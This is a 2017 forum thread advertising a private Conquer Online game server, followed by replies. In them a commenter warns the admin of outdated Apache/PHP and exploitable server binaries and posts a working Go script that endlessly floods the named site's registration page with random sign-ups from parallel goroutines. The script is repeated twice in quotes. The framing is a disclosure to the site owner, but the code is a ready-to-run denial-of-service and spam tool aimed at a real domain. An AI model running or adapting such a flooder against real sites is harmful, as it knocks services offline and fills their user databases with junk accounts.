Comrades Conquer 5095 Version

06/14/2017 11:22 outofwhack#1

*LINK REMOVED*

Game Features:

5095 Classic Version
7/24 EU Host
Max 137 Level
+12 Compose System
VIP System is Working (Get Free VIP6)
Lottery System is Working(Garment,+8 Stone, +12 Stuff)
Drop 50 Cps Per Monster and Money Direct to your Items
Hourly PK Event (SS-FB, LASTMAN)
Daily PK Event (Top Conquer, FreedomWar, Guild Altar, BlackWar, PVP-War,Spouse PK, Elite PK, StayAlive, Lastman, Attackers, FirsKiller, Donation PK, GenderWar )
Weekly PK Event(Elite PK - 16 Players join this event and 8th,3rd,2nd,1st Winner take Reward)
DragonBall & Gems Map (Drop All Refined Gem)
Party Cps Drop 50- 60 - 70 - 80 - 100 - 110 CPs and Diamond/Gold/Silver Box Reward 5K,10K,1K Cps
Beginner Stuff Give Super 2 Soc 2 SRG -1 All Stuff
CPs Arena [2 Players Arena , 3 Players Arena, 4 Players Arena, 5 Players Arena]
If you want AFK and get CPs Use AFK Paddle in TC
All Weapons uplevel NPC in Market
Special Quest (Legend War, ExtraVaganza)
Non Ninja, Have a Tower/Fan
Old Jump
2 Guild War (Big GW (10M CPs Reward) & Philippines GW(5M CPs Reward))
Leveling Map (Labyrinth)
75 Special Garment in NPC
Gold Prize Quest
Titan/Ganoderma Drop LifeFruitBasket and Other Special Item
8 Big Boss (Terato, Banshee, PirateTurner, Chaos, Nemesis, Pirate, Ranger, Ocean Ghost)
Special PK Tournament/Event
All weapons have the same power. You can use Low-level weapon.
Vote System
Drop Events and MORE..

Server Start Date : 02/06/2017
Online Players : 25+

[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]

06/15/2017 03:37 Spirited#2

TQ binary servers are very exploitable... exploits for logging into any account, nuking characters, etc. Your website is also running very exploitable versions of Apache and PHP from a decade ago. You should update that. Your registration page is easily spammed... and can cause a very easy denial of service. Here's the code to do that (below)... In general, this server is a security nightmare. Not that you'll listen, we told you this back in April.

Code:

package main

import (
    "math/rand"
    "net/http"
    "net/url"
    "strconv"
    "sync/atomic"
)

var count int32
func main() {
    println("X Gon' Give it to Ya")
    for i := 0; i < 10; i++ { go x() }
    x()
}

func x() {
    for {
        v := make(url.Values)
        v.Add("txtAd", "X Gon' Give it to Ya")
        v.Add("txtKullanici", "deadpool" + strconv.Itoa(rand.Int()))
        v.Add("txtSifre", "test")
        v.Add("txtMail", "test")
        v.Add("txtCepTel", "test")
        http.PostForm("http://www.comradesconquer.com/register.php", v)
        c := atomic.AddInt32(&count, 1)
        println(c)
    }
}

06/15/2017 04:34 EpochCommunity#3

Quote:
Originally Posted by Spirited
TQ binary servers are very exploitable... exploits for logging into any account, nuking characters, etc. Your website is also running very exploitable versions of Apache and PHP from a decade ago. You should update that. Your registration page is easily spammed... and can cause a very easy denial of service. Here's the code to do that (below)... In general, this server is a security nightmare. Not that you'll listen, we told you this back in April.
Code:
package main

import (
    "math/rand"
    "net/http"
    "net/url"
    "strconv"
    "sync/atomic"
)

var count int32
func main() {
    println("X Gon' Give it to Ya")
    for i := 0; i < 10; i++ { go x() }
    x()
}

func x() {
    for {
        v := make(url.Values)
        v.Add("txtAd", "X Gon' Give it to Ya")
        v.Add("txtKullanici", "deadpool" + strconv.Itoa(rand.Int()))
        v.Add("txtSifre", "test")
        v.Add("txtMail", "test")
        v.Add("txtCepTel", "test")
        http.PostForm("http://www.comradesconquer.com/register.php", v)
        c := atomic.AddInt32(&count, 1)
        println(c)
    }
}

Sorry for hijacking this thread but if you don't mind finding exploits on our server aswell "epoch" and notifying of such exploits would greatly appreciate it (tried pming me you but it seem you have disabled it. Thank you ahead of time.

06/15/2017 04:49 Spirited#4

Quote:

Originally Posted by EpochCommunity

Sorry for hijacking this thread but if you don't mind finding exploits on our server aswell "epoch" and notifying of such exploits would greatly appreciate it (tried pming me you but it seem you have disabled it. Thank you ahead of time.

Sure thing. I'll see what I can do.

06/16/2017 03:18 outofwhack#5

Quote:
Originally Posted by Spirited
TQ binary servers are very exploitable... exploits for logging into any account, nuking characters, etc. Your website is also running very exploitable versions of Apache and PHP from a decade ago. You should update that. Your registration page is easily spammed... and can cause a very easy denial of service. Here's the code to do that (below)... In general, this server is a security nightmare. Not that you'll listen, we told you this back in April.
Code:
package main

import (
    "math/rand"
    "net/http"
    "net/url"
    "strconv"
    "sync/atomic"
)

var count int32
func main() {
    println("X Gon' Give it to Ya")
    for i := 0; i < 10; i++ { go x() }
    x()
}

func x() {
    for {
        v := make(url.Values)
        v.Add("txtAd", "X Gon' Give it to Ya")
        v.Add("txtKullanici", "deadpool" + strconv.Itoa(rand.Int()))
        v.Add("txtSifre", "test")
        v.Add("txtMail", "test")
        v.Add("txtCepTel", "test")
        http.PostForm("http://www.comradesconquer.com/register.php", v)
        c := atomic.AddInt32(&count, 1)
        println(c)
    }
}

What can I do about it?

06/16/2017 03:44 Spirited#6

Quote:

Originally Posted by outofwhack

What can I do about it?

For the most part, the effort would be more than the gain. The website is easy to fix. TQ binary servers, however, have been dead for years... the only ones still running are the ones that changed the assembly of the servers or programmed proxies for them. Both require a very high level knowledge of the problems and assembly. I'd close the server. It's not worth restarting either if you're going to look out of community for bad sources. Go support a server that you like. Donate and help make it better. There are plenty... server administration is no easy task.

06/28/2017 22:37 outofwhack#7

Quote:

Originally Posted by Spirited

For the most part, the effort would be more than the gain. The website is easy to fix. TQ binary servers, however, have been dead for years... the only ones still running are the ones that changed the assembly of the servers or programmed proxies for them. Both require a very high level knowledge of the problems and assembly. I'd close the server. It's not worth restarting either if you're going to look out of community for bad sources. Go support a server that you like. Donate and help make it better. There are plenty... server administration is no easy task.

thank you for the information

07/10/2017 13:40 wshbr#8

#moved